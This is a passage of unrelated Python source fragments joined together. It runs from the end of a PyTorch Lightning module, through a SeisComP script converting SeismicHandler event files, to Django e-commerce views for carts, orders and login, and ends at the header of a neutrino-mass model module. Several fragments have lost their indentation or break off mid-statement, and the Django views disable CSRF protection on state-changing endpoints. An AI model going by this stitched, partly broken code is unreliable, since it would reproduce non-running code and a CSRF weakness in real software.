            tmp = np.mean([x for x in tmp if not np.isnan(x)])
            results_mean["articulation"][k][k2] = float(tmp)
    # Only rank 0 prints and persists the summary.
    if self.trainer.is_global_zero:
        pprint(results_mean)
        utils.save_results(results_mean)
        log.info(f"Saved results to {os.getcwd()}")
    return
def configure_optimizers(self):
optimizer = torch.optim.Adam(
self.parameters(),
lr=self.hparams.learning_rate,
weight_decay=self.hparams.weight_decay,
)
lr_scheduler = torch.optim.lr_scheduler.ExponentialLR(
optimizer, self.hparams.lr_decay_gamma
)
lr_dict = {
"scheduler": lr_scheduler,
"interval": "epoch",
"frequency": self.hparams.lr_decay_freq,
}
return | |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright (C) 2017 by gempa GmbH #
# #
# You can redistribute and/or modify this program under the #
# terms of the SeisComP Public License. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# SeisComP Public License for more details. #
# #
# Author: <NAME>, <NAME> #
# Email: <EMAIL> #
# #
# Converts SeismicHandler (http://www.seismic-handler.org/) event data to #
# SeisComP3. Data is read from input file or stdin if no input file is #
# specified. The result is available on stdout. #
# #
# seiscomp exec sh2proc shm.evt > sc3.xml #
# #
# Since SeismicHandler only specifies station and component codes, a #
# mapping to SeisComP3 network, location and channel codes is necessary. #
# The script assumes that the same station code is not used in different #
# networks. In case an ambiguous id is found a warning is printed and the #
# first network code is used. The channel and stream code is extracted #
# from the detecStream and detecLocid configured in the global binding.      #
# In case no configuration module is available the first location and #
# stream is used. #
###############################################################################
from seiscomp3 import Client, Core, DataModel, IO, Logging
from time import strptime
import sys, traceback
# Candidate time formats for SeismicHandler time strings, tried in order
# (first with, then without fractional seconds).
TimeFormats = [
    '%d-%b-%Y_%H:%M:%S.%f',
    '%d-%b-%Y_%H:%M:%S'
]
def wfs2Str(wfsID):
    """Render a WaveformStreamID as the dotted 'NET.STA.LOC.CHA' string."""
    codes = (wfsID.networkCode(), wfsID.stationCode(),
             wfsID.locationCode(), wfsID.channelCode())
    return '.'.join('%s' % c for c in codes)
###############################################################################
class SH2Proc(Client.Application):
###########################################################################
def __init__(self):
    """Configure the application: messaging and database access are
    enabled (needed to fetch the configured database URI), inventory and
    config module are loaded for the station/stream mapping."""
    Client.Application.__init__(self, len(sys.argv), sys.argv)
    self.setMessagingEnabled(True)
    self.setDatabaseEnabled(True, True)
    self.setLoadInventoryEnabled(True)
    self.setLoadConfigModuleEnabled(True)
    self.setDaemonEnabled(False)
    # event-data input file; '-' means read from stdin
    self.inputFile = '-'
###########################################################################
def initConfiguration(self):
    """Disable messaging/database when they are not actually needed."""
    if not Client.Application.initConfiguration(self):
        return False
    # Messaging is only used to obtain the configured database URI. When
    # the URI is passed directly (command line or configuration file),
    # messaging can be switched off. A database connection itself is also
    # unnecessary when the inventory comes from a file.
    if self.databaseURI() != '':
        self.setMessagingEnabled(False)
    elif not self.isInventoryDatabaseEnabled():
        self.setMessagingEnabled(False)
        self.setDatabaseEnabled(False, False)
    return True
###########################################################################
def validateParameters(self):
    """Pick the first positional (non-option) argument as the input file."""
    if not Client.Application.validateParameters(self):
        return False
    positional = [opt for opt in self.commandline().unrecognizedOptions()
                  if not (len(opt) > 1 and opt.startswith('-'))]
    if positional:
        self.inputFile = positional[0]
    return True
###########################################################################
def loadStreams(self):
    """Populate self.streams: station code -> {component letter: WaveformStreamID}.

    Preferred source are the detecLocid/detecStream values from the
    global bindings; without a configuration module the first matching
    stream epoch found in the inventory is used instead.
    """
    now = Core.Time.GMT()
    inv = Client.Inventory.Instance()
    self.streams = {}
    # try to load streams by detecLocid and detecStream
    mod = self.configModule()
    if mod is not None and mod.configStationCount() > 0:
        Logging.info('loading streams using detecLocid and detecStream')
        for i in range(mod.configStationCount()):
            cfg = mod.configStation(i)
            net = cfg.networkCode()
            sta = cfg.stationCode()
            # SeismicHandler data only carries station codes: keep the
            # first mapping per station, warn about duplicates
            if self.streams.has_key(sta):
                Logging.warning('ambiguous stream id found for station ' \
                                '%s.%s' % (net, sta))
                continue
            setup = DataModel.findSetup(cfg, self.name(), True)
            if not setup:
                Logging.warning('could not find station setup for %s.%s' % (
                    net, sta))
                continue
            params = DataModel.ParameterSet.Find(setup.parameterSetID())
            if not params:
                Logging.warning('could not find station parameters for ' \
                                '%s.%s' % (net, sta))
                continue
            # extract detecStream (mandatory) and detecLocid (optional)
            detecLocid = ''
            detecStream = None
            for j in xrange(params.parameterCount()):
                param = params.parameter(j)
                if param.name() == 'detecStream':
                    detecStream = param.value()
                elif param.name() == 'detecLocid':
                    detecLocid = param.value()
            if detecStream is None:
                Logging.warning('could not find detecStream for %s.%s' % (
                    net, sta))
                continue
            loc = inv.getSensorLocation(net, sta, detecLocid, now)
            if loc is None:
                Logging.warning('could not find preferred location for ' \
                                '%s.%s' % (net, sta))
                continue
            components = {}
            tc = DataModel.ThreeComponents()
            # resolve vertical + horizontal channels for the 2-character
            # stream code (e.g. 'HH') valid at the current time
            DataModel.getThreeComponents(tc, loc, detecStream[:2], now)
            if tc.vertical():
                cha = tc.vertical()
                wfsID = DataModel.WaveformStreamID(net, sta, loc.code(),
                                                   cha.code(), '')
                # key by component letter (last char of channel code)
                components[cha.code()[-1]] = wfsID
                Logging.debug('add stream %s (vertical)' % wfs2Str(wfsID))
            if tc.firstHorizontal():
                cha = tc.firstHorizontal()
                wfsID = DataModel.WaveformStreamID(net, sta, loc.code(),
                                                   cha.code(), '')
                components[cha.code()[-1]] = wfsID
                Logging.debug('add stream %s (first horizontal)' % wfs2Str(wfsID))
            if tc.secondHorizontal():
                cha = tc.secondHorizontal()
                wfsID = DataModel.WaveformStreamID(net, sta, loc.code(),
                                                   cha.code(), '')
                components[cha.code()[-1]] = wfsID
                Logging.debug('add stream %s (second horizontal)' % wfs2Str(wfsID))
            if len(components) > 0:
                self.streams[sta] = components
        return
    # fallback loading streams from inventory
    Logging.warning('no configuration module available, loading streams ' \
                    'from inventory and selecting first available stream ' \
                    'matching epoch')
    for iNet in xrange(inv.inventory().networkCount()):
        net = inv.inventory().network(iNet)
        Logging.debug('network %s: loaded %i stations' % (
            net.code(), net.stationCount()))
        for iSta in xrange(net.stationCount()):
            sta = net.station(iSta)
            # station epoch must contain 'now': skip stations that have
            # not started yet or have already ended
            try:
                start = sta.start()
                if not start <= now:
                    continue
            except:
                continue
            try:
                end = sta.end()
                if not now <= end:
                    continue
            except:
                # no end time set: epoch is open, that is fine
                pass
            for iLoc in xrange(sta.sensorLocationCount()):
                loc = sta.sensorLocation(iLoc)
                for iCha in range(loc.streamCount()):
                    cha = loc.stream(iCha)
                    wfsID = DataModel.WaveformStreamID(net.code(),
                        sta.code(), loc.code(), cha.code(), '')
                    comp = cha.code()[2]
                    if not self.streams.has_key(sta.code()):
                        components = {}
                        components[comp] = wfsID
                        self.streams[sta.code()] = components
                    else:
                        # Seismic Handler does not support network,
                        # location and channel code: make sure network and
                        # location codes match first item in station
                        # specific stream list
                        oldWfsID = self.streams[sta.code()].values()[0]
                        if net.code() != oldWfsID.networkCode() or \
                           loc.code() != oldWfsID.locationCode() or \
                           cha.code()[:2] != oldWfsID.channelCode()[:2]:
                            Logging.warning('ambiguous stream id found ' \
                                            'for station %s, ignoring %s' \
                                            % (sta.code(), wfs2Str(wfsID)))
                            continue
                        self.streams[sta.code()][comp] = wfsID
                        Logging.debug('add stream %s' % wfs2Str(wfsID))
###########################################################################
def parseTime(self, timeStr):
    """Parse a SeismicHandler time string, trying each supported format
    in order. Returns an unset Core.Time if no format matches."""
    parsed = Core.Time()
    for timeFmt in TimeFormats:
        if parsed.fromString(timeStr, timeFmt):
            return parsed
    return parsed
###########################################################################
def parseMagType(self, value):
    """Map a SeismicHandler magnitude key to the SeisComP magnitude type.

    Returns the empty string for unknown keys (caller skips setting the
    type in that case). Replaces the original if/elif chain with a
    lookup table — same mapping, single expression.
    """
    return {
        'm': 'M',
        'ml': 'ML',
        'mb': 'Mb',
        'ms': 'MS',
        'mw': 'Mw',
    }.get(value, '')
###########################################################################
def sh2proc(self, file):
ep = DataModel.EventParameters()
magnitude = DataModel.Magnitude.Create()
origin = DataModel.Origin.Create()
origin.setCreationInfo(DataModel.CreationInfo())
origin.creationInfo().setCreationTime(Core.Time.GMT())
originQuality = None
originCE = None
latFound = False
lonFound = False
depthError = None
originComments = {}
# phase variables, reset after 'end of phase'
pick = None
stationMag = None
staCode = None
compCode = None
# read file line by line, split key and value at colon
iLine = 0
for line in file:
iLine += 1
a = line.split(':', 1)
key = a[0].strip()
keyLower = key.lower()
value = None
# empty line
if len(keyLower) == 0:
continue
# end of phase
elif keyLower == '--- end of phase ---':
if pick is None:
Logging.warning('Line %i: found empty phase block' % iLine)
continue
if staCode is None or compCode is None:
Logging.warning('Line %i: end of phase, stream code ' \
'incomplete' % iLine)
continue
if not self.streams.has_key(staCode):
Logging.warning('Line %i: end of phase, station code %s ' \
'not found in inventory' % (iLine, staCode))
continue
if not self.streams[staCode].has_key(compCode):
Logging.warning('Line %i: end of phase, component %s of ' \
'station %s not found in inventory' % (
iLine, compCode, staCode))
continue
streamID = self.streams[staCode][compCode]
pick.setWaveformID(streamID)
ep.add(pick)
arrival.setPickID(pick.publicID())
origin.add(arrival)
amplitude.setPickID(pick.publicID())
ep.add(amplitude)
if stationMag is not None:
stationMag.setWaveformID(streamID)
origin.add(stationMag)
stationMagContrib = DataModel.StationMagnitudeContribution()
stationMagContrib.setStationMagnitudeID(stationMag.publicID())
magnitude.add(stationMagContrib)
pick = None
staCode = None
compCode = None
stationMag = None
continue
# empty key
elif len(a) == 1:
Logging.warning('Line %i: key without value' % iLine)
continue
value = a[1].strip()
if pick is None:
pick = DataModel.Pick.Create()
arrival = DataModel.Arrival()
amplitude = DataModel.Amplitude.Create()
try:
##############################################################
# station parameters
# station code
if keyLower == 'station code':
staCode = value
# pick time
elif keyLower == 'onset time':
pick.setTime(DataModel.TimeQuantity(self.parseTime(value)))
# pick onset type
elif keyLower == 'onset type':
found = False
for onset in [ DataModel.EMERGENT, DataModel.IMPULSIVE,
DataModel.QUESTIONABLE ]:
if value == DataModel.EPickOnsetNames_name(onset):
pick.setOnset(onset)
found = True
break;
if not found:
raise Exception('Unsupported onset value')
# phase code
elif keyLower == 'phase name':
phase = DataModel.Phase()
phase.setCode(value)
pick.setPhaseHint(phase)
arrival.setPhase(phase)
# event type, added as origin comment later on
elif keyLower == 'event type':
originComments[key] = value
# filter ID
elif keyLower == 'applied filter':
pick.setFilterID(value)
# channel code, prepended by configured Channel prefix if only
# one character is found
elif keyLower == 'component':
compCode = value
# pick evaluation mode
elif keyLower == 'pick type':
found = False
for mode in [ DataModel.AUTOMATIC, DataModel.MANUAL ]:
if value == DataModel.EEvaluationModeNames_name(mode):
pick.setEvaluationMode(mode)
found = True
break;
if not found:
raise Exception('Unsupported evaluation mode value')
# arrival weight
elif keyLower == 'weight':
arrival.setWeight(float(value))
# arrival azimuth
elif keyLower == 'theo. azimuth (deg)':
arrival.setAzimuth(float(value))
# arrival backazimuth
elif keyLower == 'theo. backazimuth (deg)':
pick.setBackazimuth(DataModel.RealQuantity(float(value)))
# arrival distance
elif keyLower == 'distance (deg)':
arrival.setDistance(float(value))
# ignored
elif keyLower == 'distance (km)':
Logging.debug('Line %i: ignoring parameter: %s' % (
iLine, key))
# arrival time residual
elif keyLower == 'residual time':
arrival.setTimeResidual(float(value))
# ignored
elif keyLower == 'quality number':
Logging.debug('Line %i: ignoring parameter: %s' % (
iLine, key))
# station magnitude value and type
elif keyLower.startswith('magnitude '):
stationMag = DataModel.StationMagnitude.Create()
stationMag.setAmplitudeID(amplitude.publicID())
stationMag.setMagnitude(DataModel.RealQuantity(float(value)))
magType = self.parseMagType(key[10:])
if len(magType) > 0:
stationMag.setType(magType)
amplitude.setType(magType)
###############################################################
# origin parameters
# event ID, added as origin comment later on
elif keyLower == 'event id':
originComments[key] = value
# magnitude value and type
elif keyLower.startswith('mean magnitude '):
magnitude.setMagnitude(DataModel.RealQuantity(float(value)))
magType = self.parseMagType(key[15:])
if len(magType) > 0:
magnitude.setType(magType)
# latitude
elif keyLower == 'latitude':
origin.latitude().setValue(float(value))
latFound = True
elif keyLower == 'error in latitude (km)':
origin.latitude().setUncertainty(float(value))
# longitude
elif keyLower == 'longitude':
origin.longitude().setValue(float(value))
lonFound = True
elif keyLower == 'error in longitude (km)':
origin.longitude().setUncertainty(float(value))
# depth
elif keyLower == 'depth (km)':
origin.setDepth(DataModel.RealQuantity(float(value)))
if depthError is not None:
origin.depth().setUncertainty(depthError)
elif keyLower == 'depth type':
Logging.debug('Line %i: ignoring parameter: %s' % (
iLine, key))
elif keyLower == 'error in depth (km)':
depthError = float(value)
try: origin.depth().setUncertainty(depthError)
except Core.ValueException: pass
# time
elif keyLower == 'origin time':
origin.time().setValue(self.parseTime(value))
elif keyLower == 'error in origin time':
origin.time().setUncertainty(float(value))
# region table, added as origin comment later on
elif keyLower == 'region table':
originComments[key] = value
# region table, added as origin comment later on
elif keyLower == 'region id':
originComments[key] = value
# source region, added as origin comment later on
elif keyLower == 'source region':
originComments[key] = value
# used station count
elif keyLower == 'no. of stations used':
if originQuality is None:
originQuality = DataModel.OriginQuality()
originQuality.setUsedStationCount(int(value))
# ignored
elif keyLower == 'reference location name':
Logging.debug('Line %i: ignoring parameter: %s' % (
iLine, key))
# confidence ellipsoid major axis
elif keyLower == 'error ellipse major':
if originCE is None:
originCE = DataModel.ConfidenceEllipsoid()
originCE.setSemiMajorAxisLength(float(value))
# confidence ellipsoid minor axis
elif keyLower == 'error ellipse minor':
if originCE is None:
originCE = DataModel.ConfidenceEllipsoid()
originCE.setSemiMinorAxisLength(float(value))
# confidence ellipsoid rotation
elif keyLower == 'error ellipse strike':
if originCE is None:
originCE = DataModel.ConfidenceEllipsoid()
originCE.setMajorAxisRotation(float(value))
# azimuthal gap
elif keyLower == 'max azimuthal gap (deg)':
if originQuality is None:
originQuality = DataModel.OriginQuality()
originQuality.setAzimuthalGap(float(value))
# creation info author
elif keyLower == 'author':
origin.creationInfo().setAuthor(value)
# creation info agency
elif keyLower == 'agency':
origin.creationInfo().setAgencyID(value)
# earth model id
elif keyLower == 'velocity model':
origin.setEarthModelID(value)
# standard error
elif keyLower | |
= True
shipping_address.zip_code = form.cleaned_data['zip_code']
shipping_address.address = form.cleaned_data['address']
shipping_address.city = form.cleaned_data['city']
shipping_address.state = form.cleaned_data['state']
shipping_address.save()
msg = 'Your shipping address has been updated'
return redirect('/shipping-address/{}/?msg={}'.format(request.POST['shipping_address_num'], msg))
msg = 'some information you provided is incorrect'
return redirect('/shipping-address/{}/?msg={}'.format(request.POST['shipping_address_num'], msg))
# AUTH
def handle_login(request):
    """Log a user in and merge the anonymous session cart into the
    user's persistent cart.

    NOTE(review): authentication is attempted with the e-mail address as
    the username — presumably a custom auth backend supports this;
    confirm against AUTHENTICATION_BACKENDS.
    """
    if request.user.is_authenticated:
        return redirect('/')
    form = LoginForm(request.POST or None)
    if form.is_valid():
        user = authenticate(username=form.cleaned_data['email'], password=form.cleaned_data['password'])
        if user is not None:
            login(request, user)
            # carry over items added while browsing anonymously; existing
            # rows are left untouched (quantities are not merged)
            if request.session.get('cart'):
                cart = request.session['cart']
                for cart_item in cart:
                    if not Cart.objects.filter(user=user, product_id=cart_item['product_id']).exists():
                        cart_item = Cart(user=user, product_id=cart_item['product_id'],quantity=cart_item['quantity'])
                        cart_item.save()
            return redirect(request.POST['redirect_url'])
    # invalid form or failed authentication: re-render the login page
    context = {'form': form}
    context['cart_count'] = len(get_cart(request))
    context['bg_img'] = bg_img()
    return render(request, 'registration/login.html', context)
def handle_register(request):
    """Register a new user, send the verification e-mail, log the user
    in and merge the anonymous session cart into the persistent cart.

    Fix: the original contained a redundant double assignment
    (`user = user = User(...)`).
    """
    if request.user.is_authenticated:
        return redirect('/')
    form = RegisterForm(request.POST or None)
    if form.is_valid():
        username = form.cleaned_data['username'].lower()
        email = form.cleaned_data['email'].lower()
        user = User(username=username, email=email)
        user.set_password(form.cleaned_data['password'])
        user.save()
        # send user account verification email
        subject = 'Verify Your Tetris Account'
        message = ''
        from_email = settings.DEFAULT_FROM_EMAIL or 'Tetris Retails <<EMAIL>>'
        recipient_list = (user.email, )
        html_message = loader.render_to_string(
            'emails/account_verification_email.html', {'user': user, 'request': request},
        )
        send_mail(subject, message, from_email, recipient_list, fail_silently=True, html_message=html_message)
        # NOTE(review): authenticating with the e-mail as the username —
        # presumably a custom auth backend handles this; confirm.
        user = authenticate(username=user.email, password=form.cleaned_data.get('password'))
        if user is not None:
            login(request, user)
            # carry over items added while browsing anonymously
            if request.session.get('cart'):
                cart = request.session['cart']
                for cart_item in cart:
                    cart_item = Cart(user=user, product_id=cart_item['product_id'], quantity=cart_item['quantity'])
                    cart_item.save()
            return redirect(request.POST['redirect_url'])
    # invalid form (or failed auto-login): re-render the register page
    context = {'form': form}
    context['cart_count'] = len(get_cart(request))
    context['bg_img'] = bg_img()
    return render(request, 'registration/register.html', context)
@login_required(login_url='/login/')
def handle_logout(request):
    """End the current session and send the user to the login page."""
    logout(request)
    return redirect('/login')
class PasswordChangeViewMod(PasswordChangeView):
    """PasswordChangeView that adds the site background image to the
    template context."""

    def get_context_data(self, **kwargs):
        # BUG FIX: super() was called with PasswordChangeView as the first
        # argument, which starts the MRO lookup *after* PasswordChangeView
        # and silently skips any get_context_data defined on it. Use this
        # class so the full parent chain runs.
        context = super(PasswordChangeViewMod, self).get_context_data(**kwargs)
        context['bg_img'] = bg_img()
        return context
# AJAX CALLS
@csrf_exempt
def add_to_cart(request):
    """Append a product to the session cart and, for authenticated
    users, also persist it as a Cart row. Always answers 200/success
    (the original returned the identical response on both paths)."""
    entry = {'product_id': request.POST['product_id'], 'quantity': request.POST['quantity']}
    session_cart = request.session.get('cart')
    if session_cart:
        session_cart.append(entry)
        request.session['cart'] = session_cart
    else:
        request.session['cart'] = [entry]
    if request.user.is_authenticated:
        Cart(user=request.user, product_id=request.POST['product_id'],
             quantity=request.POST['quantity']).save()
    response = JsonResponse({'status': 'success', 'msg': 'added successfully'})
    response.status_code = 200
    return response
@csrf_exempt
def change_cart_item_qty(request):
    """Set the quantity of a cart item in the session cart and (for
    authenticated users) in the persistent cart.

    Returns 422 when the requested quantity is below 1, otherwise a 200
    success response.

    BUG FIX: the original fell off the end of the function (returning
    None, which is not a valid Django view response) for anonymous
    users; a success response is now returned on every path.
    """
    if int(request.POST['new_quantity']) < 1:
        response = JsonResponse({'status': 'error', 'msg': 'quantity less than 0'})
        response.status_code = 422
        return response
    # update the session copy of the cart
    if request.session.get('cart'):
        product_id = request.POST['product_id']
        cart = request.session.get('cart')
        for cart_item in cart:
            if cart_item['product_id'] == product_id:
                cart_item['quantity'] = request.POST['new_quantity']
                break
        request.session['cart'] = cart
    # update (or create) the persistent cart row
    if request.user.is_authenticated:
        cart_item = Cart.objects.filter(user=request.user, product_id=request.POST['product_id']).first()
        if cart_item:
            cart_item.quantity = request.POST['new_quantity']
        else:
            cart_item = Cart(user=request.user, product_id=request.POST['product_id'], quantity=request.POST['new_quantity'])
        cart_item.save()
    response = JsonResponse({'status': 'success', 'msg': 'quantity changed successfully'})
    response.status_code = 200
    return response
@csrf_exempt
def remove_from_cart(request):
    """Remove a product from the session cart and, for authenticated
    users, from the persistent cart. Always answers 200/success (the
    original returned the identical response on both paths)."""
    posted_id = request.POST.get('product_id')
    session_cart = request.session.get('cart')
    if session_cart and posted_id:
        for entry in session_cart:
            if entry['product_id'] == posted_id:
                session_cart.remove(entry)
                break
        request.session['cart'] = session_cart
    if request.user.is_authenticated and posted_id:
        row = Cart.objects.filter(user=request.user, product_id=posted_id).first()
        if row:
            row.delete()
    response = JsonResponse({'status': 'success', 'msg': 'removed successfully'})
    response.status_code = 200
    return response
@csrf_exempt
@login_required(login_url='/login/')
def add_to_wish_list(request):
    """Add a product to the authenticated user's wish list."""
    wish_item = Wish(user=request.user, product_id=request.POST['product_id'])
    # NOTE(review): a freshly constructed model instance is always truthy,
    # so the error branch below is unreachable — confirm the intent
    # (perhaps get_or_create was meant, to avoid duplicate wish rows).
    if wish_item:
        wish_item.save()
        response = JsonResponse({'status' : 'success', 'msg': 'added successfully' })
        response.status_code = 200
        return response
    response = JsonResponse({'status' : 'error', 'msg': 'error occured, please try again later.' })
    response.status_code = 422
    return response
@csrf_exempt
@login_required(login_url='/login/')
def remove_from_wish_list(request):
    """Delete the given product from the user's wish list; answers 422
    when no matching wish-list entry exists."""
    target = Wish.objects.filter(user=request.user, product_id=request.POST['product_id']).first()
    if not target:
        response = JsonResponse({'status': 'error', 'msg': 'error occured, please try again later.'})
        response.status_code = 422
        return response
    target.delete()
    response = JsonResponse({'status': 'success', 'msg': 'removed successfully'})
    response.status_code = 200
    return response
@csrf_exempt
def empty_cart(request):
    """Clear the session cart and the authenticated user's stored cart.
    Always answers 200/success (the original returned the identical
    response on both paths)."""
    if request.session.get('cart'):
        request.session['cart'] = []
    if request.user.is_authenticated:
        Cart.objects.filter(user=request.user).delete()
    response = JsonResponse({'status': 'success', 'msg': 'cart emptied'})
    response.status_code = 200
    return response
@csrf_exempt
@login_required(login_url='/login/')
def empty_wish_list(request):
    """Delete every wish-list entry belonging to the authenticated user."""
    Wish.objects.filter(user=request.user).delete()
    response = JsonResponse({'status': 'success', 'msg': 'wish list emptied'})
    response.status_code = 200
    return response
@csrf_exempt
@login_required(login_url='/login/')
def make_purchase(request):
    """Turn the current cart into an Order.

    Preconditions are checked up front, each failing with a 422 JSON
    error: a default shipping address, a verified e-mail and a phone
    number. Stock is validated for every cart item before anything is
    persisted; on success the order and its items are saved, product
    counters updated, notification mails sent to the customer and the
    admins, and both carts (session + persistent) cleared.
    """
    if not request.user.shipping_addresses.filter(is_default=True).exists():
        response = JsonResponse({'status' : 'error', 'msg': 'your default shipping address is not set', 'shipping': True })
        response.status_code = 422
        return response
    if not request.user.is_verified:
        response = JsonResponse({'status' : 'error', 'msg': 'You cannot order without verifying your email', 'profile': True })
        response.status_code = 422
        return response
    if not request.user.phone or request.user.phone == '' :
        response = JsonResponse({'status' : 'error', 'msg': 'You cannot order without having a phone number', 'profile': True })
        response.status_code = 422
        return response
    cart = get_cart(request)
    if len(cart) > 0:
        # create an order
        order = Order(user=request.user)
        order.shipping_address = request.user.shipping_addresses.filter(is_default=True).first()
        orders = []
        for item in cart:
            # create order_items (not saved yet — stock is checked first)
            order_item = OrderItem(product_id=item.product_id,
                quantity=item.quantity, price_per_unit=item.product.price_per_unit
            )
            orders.append(order_item)
            product = Product.objects.get(pk=item.product_id)
            if product.quantity == 0:
                response = JsonResponse({'status' : 'error',
                    'msg': '#Item {} is out of stock'.format(product.name),
                    'out_of_stock': True, 'qty': 'qty_{}'.format(product.pk) })
                response.status_code = 422
                return response
            if product.quantity < int(order_item.quantity):
                response = JsonResponse({'status' : 'error',
                    'msg': 'There are only {} {} left, please change the quantity'\
                    .format(product.quantity, product.name),
                    'quantity': True, 'qty': 'qty_{}'.format(product.pk) })
                response.status_code = 422
                return response
        # all items in stock: persist the order
        order.save()
        # save the orders
        for item in orders:
            # increase sales count of the product and decrement stock
            product = item.product
            product.orders_count += int(item.quantity)
            product.quantity -= int(item.quantity)
            product.save()
            item.order = order
            item.save()
        # send mail to the customers
        subject = 'You Just Placed an Order from Tetris'
        message = ''
        from_email = settings.DEFAULT_FROM_EMAIL or 'Te<NAME> <<EMAIL>>'
        recipient_list = (request.user.email,)
        html_message = loader.render_to_string(
            'emails/customer_order_list.html', {'order': order,'request':request},
        )
        send_mail(subject, message, from_email, recipient_list, fail_silently=True, html_message=html_message)
        # send mail to the admins
        subject = '{} Just Placed an Order from Tetris'.format(request.user.username)
        message = ''
        from_email = settings.DEFAULT_FROM_EMAIL or 'Te<NAME> <<EMAIL>>'
        recipient_list = ()
        for admin in admins:
            recipient_list += (admin.email,)
        html_message = loader.render_to_string(
            'emails/customer_order_to_admin.html', {'order': order,'request':request},
        )
        send_mail(subject, message, from_email, recipient_list, fail_silently=True, html_message=html_message)
        # clear cart (both the persistent rows and the session copy)
        request.user.cart.all().delete()
        request.session['cart'] = []
        response = JsonResponse({'status' : 'success', 'msg': 'order successfully made' })
        response.status_code = 200
        return response
    response = JsonResponse({'status' : 'error', 'msg': 'your cart is empty' })
    response.status_code = 422
    return response
@csrf_exempt
@login_required(login_url='/login/')
def remove_shipping_address(request):
    """Delete one of the user's shipping addresses, unless an order is
    currently shipping to it.

    BUG FIX: `.first()` returns None for a missing/foreign address id,
    and the original then crashed with AttributeError on `.orders`; that
    case now answers with a 422 error.
    """
    shipping_address = ShippingAddress.objects.filter(user=request.user, pk=request.POST['shipping_id']).first()
    if shipping_address is None:
        response = JsonResponse({'status': 'error', 'msg': 'shipping address not found'})
        response.status_code = 422
        return response
    if not shipping_address.orders.exists():
        shipping_address.delete()
        response = JsonResponse({'status': 'success', 'msg': 'removed successfully'})
        response.status_code = 200
        return response
    response = JsonResponse({'status': 'error', 'msg': 'you cannot delete this shipping address. An order is shipping to it'})
    response.status_code = 422
    return response
@csrf_exempt
@login_required(login_url='/login/')
def customer_cancel_order(request):
    """Cancel one of the requesting user's orders.

    Requires a non-empty cancellation reason; restores product stock and
    sales counters, then notifies the admins and the customer by mail.

    NOTE(review): the status is set to 'cancelled' regardless of the
    order's current status (e.g. already delivered) — confirm whether a
    status guard is needed.
    """
    if not request.POST.get('reason') or request.POST['reason'].strip() == '':
        response = JsonResponse({'status' : 'error', 'msg': 'Please enter a reason' })
        response.status_code = 422
        return response
    order = Order.objects.filter(ref=request.POST['order_ref'], user=request.user).first()
    if order:
        order.status = 'cancelled'
        order.reason_cancelled = request.POST['reason'].strip()
        order.canceller = request.user
        order.save()
        # increase stock
        for item in order.order_items.all():
            # roll back sales count and stock of the product
            product = item.product
            product.orders_count -= int(item.quantity)
            product.quantity += int(item.quantity)
            product.save()
        # send mail to the admins
        subject = '{} Just Cancelled an Order from Tetris'.format(request.user.username)
        message = ''
        from_email = settings.DEFAULT_FROM_EMAIL or 'Tetris Retails <<EMAIL>>'
        recipient_list = ()
        for admin in admins:
            recipient_list += (admin.email,)
        html_message = loader.render_to_string(
            'emails/customer_cancel_order_to_admin.html', {'order': order,'request':request},
        )
        send_mail(subject, message, from_email, recipient_list, fail_silently=True, html_message=html_message)
        # send mail to the customers
        subject = 'You Have Cancelled Order {} from Tetris'.format(order.ref)
        message = ''
        from_email = settings.DEFAULT_FROM_EMAIL or 'Tetris Retails <<EMAIL>>'
        recipient_list = (request.user.email,)
        html_message = loader.render_to_string(
            'emails/customer_cancel_order.html', {'order': order,'request':request},
        )
        send_mail(subject, message, from_email, recipient_list, fail_silently=True, html_message=html_message)
        response = JsonResponse({'status' : 'success', 'msg': 'Order cancelled successfully' })
        response.status_code = 200
        return response
    response = JsonResponse({'status' : 'error', 'msg': 'an error occured. please try again later' })
    response.status_code = 422
    return response
@csrf_exempt
@login_required(login_url='/login/')
def customer_confirm_delivery(request):
if not request.POST.get('order_ref'):
response = JsonResponse({'status' : 'error', 'msg': 'the order reference is needed' })
response.status_code = 422
return response
order = Order.objects.filter(ref=request.POST['order_ref'], user=request.user).first()
if order:
order.confirm_delivery_date = datetime.now()
order.status = 'delivered'
order.save()
for order_item in order.order_items.all():
order_item.product.num_deliveries += 1
order_item.product.save()
# send mail to the customers
subject = 'You Have Confirmed Delivery of Order {} from Tetris'.format(order.ref)
message = ''
from_email = settings.DEFAULT_FROM_EMAIL or 'Tetris Retails <<EMAIL>>'
recipient_list = (request.user.email,)
html_message = loader.render_to_string(
'emails/customer_confirm_delivery.html', {'order': order,'request':request},
)
send_mail(subject, message, from_email, recipient_list, fail_silently=False, html_message=html_message)
# send mail to the admins
subject = '{} Just Confirmed the Delivery of Order {}'\
.format(request.user.username, order.ref)
message = ''
from_email = settings.DEFAULT_FROM_EMAIL or 'Tetris Retails <<EMAIL>>'
recipient_list = ()
for admin in admins:
recipient_list += (admin.email,)
html_message = loader.render_to_string(
'emails/customer_confirm_order_to_admin.html', {'order': order,'request':request},
)
send_mail(subject, message, from_email, recipient_list, fail_silently=False, html_message=html_message)
response = JsonResponse({'status' : 'success', 'msg': 'Order delivery confirmed | |
#!/usr/bin/env python3
"""Functions to generate completions of operators with explicit SU(2) structure."""
from neutrinomass.tensormethod.core import (
Index,
Field,
IndexedField,
eps,
delta,
is_invariant_symbol,
Operator,
get_dynkin,
D,
)
from neutrinomass.tensormethod.contract import (
lorentz_singlets,
colour_singlets,
invariants,
contract_su2,
)
from neutrinomass.utils import timeit
from neutrinomass.tensormethod.utils import safe_nocoeff
from neutrinomass.completions.utils import (
flatten,
chunks,
factors,
multiple_replace,
allowed_lor_dyn,
)
from neutrinomass.utils.functions import remove_equivalent, remove_equivalent_nopop
from neutrinomass.completions.core import (
Completion,
Model,
FailedCompletion,
EffectiveOperator,
cons_completion_field,
FieldType,
VectorLikeDiracFermion,
MajoranaFermion,
ComplexScalar,
RealScalar,
)
from neutrinomass.completions.topologies import get_topology_data, Leaf
from neutrinomass.utils import pmatch
from neutrinomass.utils.functions import stringify_qns, conjugate_term
from typing import Tuple, List, Dict, Union
import networkx as nx
import networkx.algorithms.isomorphism as iso
from copy import copy, deepcopy
from alive_progress import alive_bar
from collections import Counter, defaultdict
from itertools import permutations, groupby, combinations
from sympy.tensor.tensor import Tensor
from sympy import prime
from functools import lru_cache, reduce
import re
import os
def replace(data, to_replace, replace_with, found=False) -> Tuple[tuple, bool]:
    """Substitute the first occurrence of ``to_replace`` in the nested tuple
    ``data`` with ``replace_with``.

